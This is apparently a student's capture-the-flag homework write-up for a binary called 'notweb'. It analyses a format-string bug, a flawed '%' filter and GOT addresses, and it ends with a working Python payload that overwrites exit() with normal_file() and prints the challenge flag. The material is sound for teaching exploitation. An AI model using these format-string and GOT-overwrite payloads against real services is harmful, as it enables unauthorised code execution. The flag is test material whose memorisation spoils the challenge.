2014-11-27

notweb Writeup

Security Programming Homework 3-2

Finding Weak Points

After using gdb to do the dynamic analysis, I found that function main() will call function get_request(). So I set the break point at the line which calls get_request() and check it out step by step. The program calls fgets() to get the input, and using strtok() to chop the string according to the spaces. If the whold string only consists of one single word, it calls exit to terminate the program. Otherwise the program will go on.

08048a51:       89 45 ec                mov    DWORD PTR [ebp-0x14],eax
08048a54:       83 7d ec 00             cmp    DWORD PTR [ebp-0x14],0x0
08048a58:       75 0c                   jne    8048a66 <get_request+0x90>
08048a5a:       c7 04 24 00 00 00 00    mov    DWORD PTR [esp],0x0
08048a61:       e8 ea fb ff ff          call   8048650 <exit@plt>

The variable buf sucks in the whole line of input then splits the input into tokens according to space and colon. A diagram is showed below:

ORIGINAL INPUT:

GET /echo:%x%x%x%x%x
|   |     |
|   |     v
|   v     stored in local variable in ``main()``, using ``s`` as example
v   length of the string is 5, the first character is stored in ``file``
abandoned

And there is a piece of code that contains printf(buf) in the function echo(). With this, exploiting the vulnerability of format string to leak arbitrary memory is easy. Even write some values into memory could be possible.

Weird Filter

In get_request(), the first n bytes of global variable buf will be eliminated before return. This will make the second for loop in filter_format() has no effect. Because the first n bytes of global variable buf are already been cleared with zeros, the length of the string is zero. Thus the for loop will ended up immediately. As a result, the global buf remains, ‘%’ is not replaced with ‘_’.

In function echo(), after calling filter_format(), the string which is after ‘:’ (‘%’ have already been replaced with ‘_’) will be copied to the front end of the global variable buf. This could make the string which is after ‘:’ of the global variable buf (‘%’ are not replaced with ‘_’) being overlaped. So extra calculation must be taken to assure the target string not being messed, if someone want to exploit the program using format string.

According to the example string which is entered into the program, the value in the global variable buf before calling printf(buf) in function echo() is:

_x_x_x_x_x\nx%x%x%x%x\n

The result showed up is:

_x_x_x_x_x
xfffe4f4cbf7f4b3d00

If the length of the string after ‘:’ (including ‘\n’) is exactly 10, it can overwrite the byte which contains ‘:’ (‘:’ is replaced with string terminator because of strtok). In the end, the whole string is connected again, rear part is our original format string.

Padding some trival characters between ‘:’ and the format string to ensure to connect the global variable buf again, if the lenth of the string is less than 10.

GET /echo:aaaaaaa%p

For the string which is longer than 10, one must pad some trival characters to make sure the format string won’t be covered by something useless by the fxxking program logic.

GGET /echo:%p%p%p%p%p

Objective

The return address is at $esp+0x1c in echo(), that is to say, using %7$p could leak the return address (of course the length must be at least 10 characters). Our objective is to modify the address (0x0804917f) with the address of function normal_file() (0x08048c8f). Besides, the content of the global variable file should be “flag”. With all of this, the function normal_file() can have the ability of opening the file of the flag and reading that file. The gods send nut to those who have no teeth, the server side has already enabled ASLR, so we cannot know the location of the return address in the stack. Thus, exploitation using format string to overwrite the return address in the stack is not practical.

However, there’s another way to control the eip though the return address cannot be modified. The Global Offset Table (GOT) might be a good candidate. The offset of the function fflush() in the GOT is 0x0804b018. The content in that is the actual position of fflush() (0xf7e78760) after GLIBC was dynamically loaded into the program. So we just have to replace the address with the address of normal_file(). But again, the gods send nut to those who have no theeth, there is a fflush() in the function normal_file(). So doing this will cause an endless loop. A better choice is to modify the address of the function exit() in the GOT to avoid that. The offset of the function exit() in the GOT is 0x0804b03c.

$ readelf -r notweb

Relocation section '.rel.dyn' at offset 0x49c contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
 0804affc  00000c06 R_386_GLOB_DAT    00000000   __gmon_start__
 0804b080  00001805 R_386_COPY        0804b080   stdin
 0804b0a0  00001605 R_386_COPY        0804b0a0   stdout

Relocation section '.rel.plt' at offset 0x4b4 contains 21 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
 0804b00c  00000107 R_386_JUMP_SLOT   00000000   strstr
 0804b010  00000207 R_386_JUMP_SLOT   00000000   strcmp
 0804b014  00000307 R_386_JUMP_SLOT   00000000   printf
 0804b018  00000407 R_386_JUMP_SLOT   00000000   fflush
 0804b01c  00000507 R_386_JUMP_SLOT   00000000   memcpy
 0804b020  00000607 R_386_JUMP_SLOT   00000000   bzero
 0804b024  00000707 R_386_JUMP_SLOT   00000000   fgets
 0804b028  00000807 R_386_JUMP_SLOT   00000000   fclose
 0804b02c  00000907 R_386_JUMP_SLOT   00000000   chdir
 0804b030  00000a07 R_386_JUMP_SLOT   00000000   fseek
 0804b034  00000b07 R_386_JUMP_SLOT   00000000   fread
 0804b038  00000c07 R_386_JUMP_SLOT   00000000   __gmon_start__
 0804b03c  00000d07 R_386_JUMP_SLOT   00000000   exit
 0804b040  00000e07 R_386_JUMP_SLOT   00000000   strlen
 0804b044  00000f07 R_386_JUMP_SLOT   00000000   __libc_start_main
 0804b048  00001007 R_386_JUMP_SLOT   00000000   write
 0804b04c  00001107 R_386_JUMP_SLOT   00000000   ftell
 0804b050  00001207 R_386_JUMP_SLOT   00000000   fopen
 0804b054  00001307 R_386_JUMP_SLOT   00000000   strncpy
 0804b058  00001407 R_386_JUMP_SLOT   00000000   strtok
 0804b05c  00001507 R_386_JUMP_SLOT   00000000   sprintf

Besides controlling the eip, the global variable file should be set to the string “flag”, too.

Exploitation

The key point is that how to design the payload and keep the original format string from destroying by the filter. The following is the main part of the exploitation code.

# exit()'s offset in GOT showed up in stack fram
# normal_file() @ 0x08048c8f
# total 16 bytes
addr1  = struct.pack('<I', 0x0804b03c) # 0x8f
addr1 += struct.pack('<I', 0x0804b03d) # 0x8c
addr1 += struct.pack('<I', 0x0804b03e) # 0x04
addr1 += struct.pack('<I', 0x0804b03f) # 0x08

# file's address showed up in stack frame
# file @ 0x080637e0
# total 16 bytes
addr2  = struct.pack('<I', 0x080637e0) # 'f': 0x66 102
addr2 += struct.pack('<I', 0x080637e1) # 'l': 0x6c
addr2 += struct.pack('<I', 0x080637e2) # 'a': 0x61
addr2 += struct.pack('<I', 0x080637e3) # 'g': 0x67

inject1 = '%7c%15$hhn%253c%16$hhn%120c%17$hhn%4c%18$hhn' # 44 bytes
inject2 = '%78c%30$hhn%6c%31$hhn%245c%32$hhn%6c%33$hhna' # 44 bytes

padding = 'G'*110

payload = padding + 'GET /echo:' + addr1 + inject1 + addr2 + inject2 + '\n'

Flag

The flag is:

SECPROG{But_PWN_!s_e@sier_th@n_WEB_XDDDD}